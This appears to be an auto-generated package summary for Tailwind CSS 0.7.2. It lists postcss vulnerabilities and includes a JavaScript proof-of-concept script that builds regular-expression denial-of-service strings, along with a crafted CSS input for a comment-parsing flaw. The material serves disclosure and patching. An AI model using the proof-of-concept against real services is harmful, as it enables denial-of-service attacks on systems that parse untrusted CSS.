Tailwind CSS saw a minor version update from 0.7.1 to 0.7.2 focused on internal improvements and bug fixes, rather than introducing new features directly impacting the user experience. Both versions share the same core dependencies, including essential tools like PostCSS, Autoprefixer, and Lodash, ensuring a consistent foundation for utility-first CSS development. The developer dependencies also remain identical, highlighting a continued commitment to code quality, testing, and linting using tools such as Jest, ESLint, and Prettier.
The key difference lies in the internal packaging and distribution. Version 0.7.2 has a slightly larger unpacked size (2112987 bytes) compared to 0.7.1 (2112595 bytes), suggesting minor modifications to the codebase or assets. For developers, this means a potentially more refined and stable experience. While the change isn't drastic, upgrading to 0.7.2 is recommended to benefit from any subtle bug fixes and optimizations. Both versions were released on the same day, indicating a quick follow-up to the previous release, further emphasizing the focus on stability for this iteration of the Tailwind CSS framework. Developers can continue to expect rapid UI development through a component-based approach thanks to the existing core dependencies.
All the vulnerabilities related to the version 0.7.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.